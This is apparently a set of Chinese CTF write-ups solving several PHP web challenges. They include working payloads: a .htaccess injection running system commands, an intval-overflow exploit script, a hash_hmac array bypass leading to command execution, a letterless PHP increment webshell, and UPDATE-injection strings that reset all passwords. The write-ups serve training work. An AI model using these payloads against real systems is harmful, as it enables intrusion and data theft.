[羊城杯 2020]easyphp
源码
发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的,只不过存在过滤
stristr函数对文件内容进行过滤,该函数绕过还是简单的,只需要添加一些特殊字符就可以了,和字符串弱类型比较相似。对于文件名的正则匹配,有点没读懂怎么个条件,到底是允许字母还是不允许,测试了一下该代码环境,运行之后明白该正则条件输入.[a-z]是可以绕过该正则的,返回false
知道了这些剩下的就是利用了
既然会删除除了index.php文件,直接覆盖index.php文件是不是就可以了,尝试写入index.php文件,但是再次访问并没有什么内容。尝试写入其他的php文件中,发现只是将文件内容回显了罢了
发现靶机目录环境并不会解析php文件,所以才会原封不动返回出来内容,想到上传文件利用.htaccess配置文件执行jpg文件中的php代码,但是再进行第二次文件写入时会把之前的文件删除掉,所以不能上传两次来利用,index.php文件也不能写入。
去找了一下.htaccess文件的用法
[CTF].htaccess的使用技巧总结_.htaccess ctf_Y4tacker的博客-CSDN博客
文章给出了file被过滤的情况,正好和本次过滤吻合可以直接套用。但是在文件写入函数中还有一个参数\nHello, world,由于\n所以在写入文件之后会把后面的英文写入到下一行,根据了解这不符合当前.htaccess解析格式,不能够正常解析,所以需要在上面距离的代码后面先闭合php代码,再加上\将\n的\进行转义即可,即为?>\,闭合结果为?>\\nHello, world即可将后面的内容输出为一行
所有的细节已经分析完毕,只需要将文件名和文件内容传参即可自动解析其中的php代码,将结果输出出来了,#后面跟着任意代码执行,由于传参是一行的,所以换行的地方需要使用%0a进行代替,#用%23代替,传参测试paylaod,运行两次成功执行代码
?content=php_value auto_prepend_fi\%0Ale .htaccess%0A%23<?php system("ls")?>\&filename=.htaccess
ls /
cat /flag,因为这里他过滤掉了flag,直接用fl\ag来绕过,得到flag
[NCTF 2018]小绿草之最强大脑
看源码得到:
扫一下,
访问index.php.bak得到了源码
这里的
intval函数会防止程序溢出,所以输入的大于21位的数字经过PHP处理的值会发送改变:<?php echo intval(‘4200000000000000000000’);?>
32位系统:2147483647 64位系统:9223372036854775807
题目是64位系统,溢出后为9223372036854775807
利用exp
import requests
import re
import time
s = requests.Session() # 因为要连续计算,用来保存当前会话的持续有效性
url = "http://node4.anna.nssctf.cn:28673/"
number ="4200000000000000000000" #输入的数字
r = s.get(url)
math = ''
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0',
}
while(1):
num_pattern =re.compile(r'<div style="display:inline;">(.*?)</div>')
num = num_pattern.findall(r.text) #正则提取公式
gg = "9223372036854775807"+'+'+math.join(num)[0:-1] #拼接真实的公式
print(gg)
ans = eval(gg) #利用eval直接来计算结果
print(ans)
data = "input={number}&ans={ans}%".format(number=number,ans=ans)
r =s.post(url,headers=headers,data=data)
time.sleep(1.5) #延时1.5秒
print(r.text)
得到flag
[羊城杯 2020]Blackcat
扫了一下,但是没啥有用的东西
看了一下wp才知道要打开.mp3网页,看源码,得到本身的源码 
首先是我们传入的两个变量$_POST['Black-Cat-Sheriff']和$_POST['One-ear']不能为空。其次就是判断$_POST['White-cat-monitor']是否存在,是则第二个加密私钥$clandestine为$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);的值,否则第二个加密私钥的值就是环境变量的getenv("clandestine");
由于我们需要让sha256加密后的$_POST['One-ear']值等于我们传入的$_POST['Black-Cat-Sheriff'],才能成功执行传入的$_POST['One-ear']。
所以我们要让加密的公钥是我们可知的,环境变量中的公钥我们肯定是不可知的。我们只能让$_POST['White-cat-monitor']用sha256加密后的值作为公钥,那么我们也就只需要让加密后的$clandestine值是可以被我们知道的。本地demo测试,它是不能加密数组的,否则就会报错。可以利用这一点传入White-cat-monitor[]=,这样就能让生成的加密公钥$clandestine为空,从而达到下面if判断为假。
sha2和md5相似,弱相等能用数组绕过,
第一个hash_hmac的密钥是环境变量clandestine的值,如果data传入的值为数组,那么就会返回NULL
那么第二个hash_hmac的密钥就是NULL,返回的值就只跟data有关,就是我们可控的了
可以本地执行hash_hmac函数,然后让$_POST['Black-Cat-Sheriff']的值等于他就行
最后的命令执行这里出不了网,使用;来执行多条命令
还用了echo,是有回显的,但是exec只返回命令执行结果的最后一行内容。
ls是多行显示,所以只能显示一行的内容
这里使用dir来显示文件夹内容
得到flag
羊城杯还是有很大含金量的,学了好多东西
[TQLCTF 2022]simple_bypass
看提示说是无字母rce
进来时一个登录框
注册一个进来发现和虚拟机差不多,是一个沙箱
点击好康的,f12发现了传参路径,使用了get_pic.php方法
看源码发现了base64加密
从而可以实现任意文件读取,可以获得index.php,template.html,get_pic.php的源码
get_pic.php?image=index.php
复制源码进行base64解码
PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwppZihpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pKXsKCSRoYXNoX3VzZXIgPSBtZDUoJF9QT1NUWyd1c2VyJ10pOwoJJGhhc2hfcGFzcyA9ICd6c2YnLm1kNSgkX1BPU1RbJ3Bhc3MnXSk7CglpZihpc3NldCgkX1BPU1RbJ3B1bmN0dWF0aW9uJ10pKXsKCQkvL2ZpbHRlcgoJCWlmIChzdHJsZW4oJF9QT1NUWyd1c2VyJ10pID4gNil7CgkJCWVjaG8oIjxzY3JpcHQ+YWxlcnQoJ1VzZXJuYW1lIGlzIHRvbyBsb25nIScpOzwvc2NyaXB0PiIpOwoJCX0KCQllbHNlaWYoc3RybGVuKCRfUE9TVFsnd2Vic2l0ZSddKSA+IDI1KXsKCQkJZWNobygiPHNjcmlwdD5hbGVydCgnV2Vic2l0ZSBpcyB0b28gbG9uZyEnKTs8L3NjcmlwdD4iKTsKCQl9CgkJZWxzZWlmKHN0cmxlbigkX1BPU1RbJ3B1bmN0dWF0aW9uJ10pID4gMTAwMCl7CgkJCWVjaG8oIjxzY3JpcHQ+YWxlcnQoJ1B1bmN0dWF0aW9uIGlzIHRvbyBsb25nIScpOzwvc2NyaXB0PiIpOwoJCX0KCQllbHNlewoJCQlpZihwcmVnX21hdGNoKCcvW15cd1wvXChcKVwqPD5dLycsICRfUE9TVFsndXNlciddKSA9PT0gMCl7CgkJCQlpZiAocHJlZ19tYXRjaCgnL1teXHdcL1wqOlwuXDtcKFwpXG48Pl0vJywgJF9QT1NUWyd3ZWJzaXRlJ10pID09PSAwKXsKCQkJCQkkX1BPU1RbJ3B1bmN0dWF0aW9uJ10gPSBwcmVnX3JlcGxhY2UoIi9bYS16LEEtWiwwLTk+XD9dLyIsIiIsJF9QT1NUWydwdW5jdHVhdGlvbiddKTsKCQkJCQkkdGVtcGxhdGUgPSBmaWxlX2dldF9jb250ZW50cygnLi90ZW1wbGF0ZS5odG1sJyk7CgkJCQkJJGNvbnRlbnQgPSBzdHJfcmVwbGFjZSgiX19VU0VSX18iLCAkX1BPU1RbJ3VzZXInXSwgJHRlbXBsYXRlKTsKCQkJCQkkY29udGVudCA9IHN0cl9yZXBsYWNlKCJfX1BBU1NfXyIsICRoYXNoX3Bhc3MsICRjb250ZW50KTsKCQkJCQkkY29udGVudCA9IHN0cl9yZXBsYWNlKCJfX1dFQlNJVEVfXyIsICRfUE9TVFsnd2Vic2l0ZSddLCAkY29udGVudCk7CgkJCQkJJGNvbnRlbnQgPSBzdHJfcmVwbGFjZSgiX19QVU5DX18iLCAkX1BPU1RbJ3B1bmN0dWF0aW9uJ10sICRjb250ZW50KTsKCQkJCQlmaWxlX3B1dF9jb250ZW50cygnc2FuZGJveC8nLiRoYXNoX3VzZXIuJy5waHAnLCAkY29udGVudCk7CgkJCQkJZWNobygiPHNjcmlwdD5hbGVydCgnU3VjY2Vzc2VkIScpOzwvc2NyaXB0PiIpOwoJCQkJfQoJCQkJZWxzZXsKCQkJCQllY2hvKCI8c2NyaXB0PmFsZXJ0KCdJbnZhbGlkIGNoYXJzIGluIHdlYnNpdGUhJyk7PC9zY3JpcHQ+Iik7CgkJCQl9CgkJCX0KCQkJZWxzZXsKCQkJCWVjaG8oIjxzY3JpcHQ+YWxlcnQoJ0ludmFsaWQgY2hhcnMgaW4gdXNlcm5hbWUhJyk7PC9zY3JpcHQ+Iik7CgkJCX0KCQl9Cgl9CgllbHNlewoJCXNldGNvb2tpZSgidXNlciIsICRfUE9TVFsndXNlciddLCB0aW1lKCkrMzYwMCk7CgkJc2V0Y29va2llKCJwYXNzIiwgJGhhc2hfcGFzcywgdGltZSgpKzM2MDApOwoJCUhlYWRlcigiTG9jYXRpb246c2FuZGJveC8kaGFzaF91c2VyLnBocCIpOwoJfQp9Cj8+Cgo8IWRvY3R5cGUgaHRtbD4KPGh0bWwgbGFuZz0iemgiPgo8aGVhZD4KCTxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KCTxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSxjaHJvbWU9MSI+IAoJPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgoJPHRpdGxlPlNpbXBsZSBMaW51eDwvdGl0bGU+Cgk8bGluayByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiBocmVmPSJjc3Mvc3R5bGVzLmNzcyI+Cgk8IS0tW2lmIElFXT4KCQk8c2NyaXB0IHNyYz0iaHR0cDovL2xpYnMuYmFpZHUuY29tL2h0bWw1c2hpdi8zLjcvaHRtbDVzaGl2Lm1pbi5qcyI+PC9zY3JpcHQ+Cgk8IVtlbmRpZl0tLT4KPC9oZWFkPgo8Ym9keT4KCTxkaXYgY2xhc3M9ImpxMjItY29udGFpbmVyIiBzdHlsZT0icGFkZGluZy10b3A6MTAwcHgiPgoJCTxkaXYgY2xhc3M9ImxvZ2luLXdyYXAiPgoJCQk8ZGl2IGNsYXNzPSJsb2dpbi1odG1sIj4KCQkJCTxpbnB1dCBpZD0idGFiLTEiIHR5cGU9InJhZGlvIiBuYW1lPSJ0YWIiIGNsYXNzPSJzaWduLWluIiBjaGVja2VkPjxsYWJlbCBmb3I9InRhYi0xIiBjbGFzcz0idGFiIj5TaWduIEluPC9sYWJlbD4KCQkJCTxpbnB1dCBpZD0idGFiLTIiIHR5cGU9InJhZGlvIiBuYW1lPSJ0YWIiIGNsYXNzPSJzaWduLXVwIj48bGFiZWwgZm9yPSJ0YWItMiIgY2xhc3M9InRhYiI+U2lnbiBVcDwvbGFiZWw+CgkJCQk8ZGl2IGNsYXNzPSJsb2dpbi1mb3JtIj4KCQkJCQk8Zm9ybSBhY3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KCQkJCQkJPGRpdiBjbGFzcz0ic2lnbi1pbi1odG0iPgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InVzZXIiIGNsYXNzPSJsYWJlbCI+VXNlcm5hbWU8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0idXNlciIgbmFtZT0idXNlciIgdHlwZT0idGV4dCIgY2xhc3M9ImlucHV0Ij4KCQkJCQkJCTwvZGl2PgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InBhc3MiIGNsYXNzPSJsYWJlbCI+UGFzc3dvcmQ8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0icGFzcyIgbmFtZT0icGFzcyIgdHlwZT0icGFzc3dvcmQiIGNsYXNzPSJpbnB1dCIgZGF0YS10eXBlPSJwYXNzd29yZCI+CgkJCQkJCQk8L2Rpdj4KCQkJCQkJCTwhLS0gPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxpbnB1dCBpZD0iY2hlY2siIHR5cGU9ImNoZWNrYm94IiBjbGFzcz0iY2hlY2siIGNoZWNrZWQ+CgkJCQkJCQkJPGxhYmVsIGZvcj0iY2hlY2siPjxzcGFuIGNsYXNzPSJpY29uIj48L3NwYW4+IEtlZXAgbWUgU2lnbmVkIGluPC9sYWJlbD4KCQkJCQkJCTwvZGl2PiAtLT4KCQkJCQkJCTxkaXYgY2xhc3M9Imdyb3VwIj4KCQkJCQkJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnV0dG9uIiB2YWx1ZT0iU2lnbiBJbiI+CgkJCQkJCQk8L2Rpdj4KCQkJCQkJCTxkaXYgY2xhc3M9ImhyIj48L2Rpdj4KCQkJCQkJCTwhLS0gPGRpdiBjbGFzcz0iZm9vdC1sbmsiPgoJCQkJCQkJCTxhIGhyZWY9IiNmb3Jnb3QiPkZvcmdvdCBQYXNzd29yZD88L2E+CgkJCQkJCQk8L2Rpdj4gLS0+CgkJCQkJCTwvZGl2PgoJCQkJCTwvZm9ybT4KCQkJCQk8Zm9ybSBhY3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KCQkJCQkJPGRpdiBjbGFzcz0ic2lnbi11cC1odG0iPgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InVzZXIiIGNsYXNzPSJsYWJlbCI+VXNlcm5hbWU8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0idXNlciIgbmFtZT0idXNlciIgdHlwZT0idGV4dCIgY2xhc3M9ImlucHV0Ij4KCQkJCQkJCTwvZGl2PgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InBhc3MiIGNsYXNzPSJsYWJlbCI+UGFzc3dvcmQ8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0icGFzcyIgbmFtZT0icGFzcyIgdHlwZT0icGFzc3dvcmQiIGNsYXNzPSJpbnB1dCIgZGF0YS10eXBlPSJwYXNzd29yZCI+CgkJCQkJCQk8L2Rpdj4KCQkJCQkJCTxkaXYgY2xhc3M9Imdyb3VwIj4KCQkJCQkJCQk8bGFiZWwgZm9yPSJwYXNzIiBjbGFzcz0ibGFiZWwiPllvdXIgV2Vic2l0ZTwvbGFiZWw+CgkJCQkJCQkJPGlucHV0IGlkPSJwYXNzIiBuYW1lPSJ3ZWJzaXRlIiB0eXBlPSJ0ZXh0IiBjbGFzcz0iaW5wdXQiPgoJCQkJCQkJPC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJncm91cCI+CgkJCQkJCQkJPGxhYmVsIGZvcj0icGFzcyIgY2xhc3M9ImxhYmVsIj5Zb3VyIFB1bmN0dWF0aW9uPC9sYWJlbD4KCQkJCQkJCQk8aW5wdXQgaWQ9InBhc3MiIG5hbWU9InB1bmN0dWF0aW9uIiB0eXBlPSJ0ZXh0IiBjbGFzcz0iaW5wdXQiPgoJCQkJCQkJPC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJncm91cCI+CgkJCQkJCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiIgdmFsdWU9IlNpZ24gVXAiPgoJCQkJCQkJPC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJociI+PC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJmb290LWxuayI+CgkJCQkJCQkJPGxhYmVsIGZvcj0idGFiLTEiPkFscmVhZHkgTWVtYmVyPzwvYT4KCQkJCQkJCTwvZGl2PgoJCQkJCQk8L2Rpdj4KCQkJCQk8L2Zvcm0+CgkJCQk8L2Rpdj4KCQkJPC9kaXY+CgkJPC9kaXY+Cgk8L2Rpdj4KCQo8L2JvZHk+CjwvaHRtbD4=
关键代码
<?php
error_reporting(0);
if(isset($_POST['user']) && isset($_POST['pass'])){
$hash_user = md5($_POST['user']);
$hash_pass = 'zsf'.md5($_POST['pass']);
if(isset($_POST['punctuation'])){
//filter
if (strlen($_POST['user']) > 6){
echo("<script>alert('Username is too long!');</script>");
}
elseif(strlen($_POST['website']) > 25){
echo("<script>alert('Website is too long!');</script>");
}
elseif(strlen($_POST['punctuation']) > 1000){
echo("<script>alert('Punctuation is too long!');</script>");
}
else{
if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){
if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){
$_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);
$template = file_get_contents('./template.html');
$content = str_replace("__USER__", $_POST['user'], $template);
$content = str_replace("__PASS__", $hash_pass, $content);
$content = str_replace("__WEBSITE__", $_POST['website'], $content);
$content = str_replace("__PUNC__", $_POST['punctuation'], $content);
file_put_contents('sandbox/'.$hash_user.'.php', $content);
echo("<script>alert('Successed!');</script>");
}
else{
echo("<script>alert('Invalid chars in website!');</script>");
}
}
else{
echo("<script>alert('Invalid chars in username!');</script>");
}
}
}
else{
setcookie("user", $_POST['user'], time()+3600);
setcookie("pass", $hash_pass, time()+3600);
Header("Location:sandbox/$hash_user.php");
}
}
?>
在这里可以看到user,website都做了严格的过滤并且限制输入长度
但是观察到strlen($_POST['punctuation']) > 1000,猜测这是利用的突破口
观察到是无字母数字RCE,那么大概思路就是自增构造
还看到一个 template.html,进去看看,太长了,截取了关键代码
<div id="start_block"> <a title="开始" id="start_btn"></a>
<div id="start_item">
<ul class="item admin">
<li><span class="adminImg"></span>
<?php
error_reporting(0);
$user = ((string)__USER__);
$pass = ((string)__PASS__);
if(isset($_COOKIE['user']) && isset($_COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass){
echo($_COOKIE['user']);`
}
else{
die("<script>alert('Permission denied!');</script>");
}
?>
</li>
</ul>
<ul class="item">
<li><span class="sitting_btn"></span>系统设置</li>
<li><span class="help_btn"></span>使用指南 <b></b></li>
<li><span class="about_btn"></span>关于我们</li>
<li><span class="logout_btn"></span>退出系统</li>
</ul>
</div>
</div>
</div>
<a href="#" class="powered_by">__PUNC__</a>
分析一下,(string)__USER__会将__USER__强转成string类型。
然后利用点已经知道是无数字字母RCE,<?php被禁了,那么只能利用代码前面自带的<?php去shell
我们选择可以利用注释符注释,然后用);闭合回去,__PUNC__写exp再把下面的注释掉。
payload:
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
注册一下
//注册页面
username:a/*
passwd:a
website:a
punctuation:*/);$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);/*
//这个自增代表的是eval(@_POST[_]);
注册成功,进行命令执行
ls /
在源代码最下边找到了目录
_=system('cat /flag-44cbecae-89e7-41f5-a673-3048a77315f8');
得到flag
[HUBUCTF 2022 新生赛]ezsql
提示说是sql注入,搞了半天没搞明白,是updata注入
推一篇博客给大家,也是之前没学过的
SQL注入Update注入_now ~ try的博客-CSDN博客
放一篇wp给大家,不知道要怎么注入
HUBUCTF2022-ezsql-wp | Antel0p3's blog
注册登入发现可以更新个人信息 其中age字段存在update注入,可通过描述字段查看所需信
修改当前表所有nickname为444
nickname=aa&age=11,nickname=444%23&description=111&token=
修改当前表所有password为123
nickname=aa&age=11,password=0x3230326362393632616335393037356239363462303731353264323334623730%23&description=111&token=
登录 admin/123,得到flag
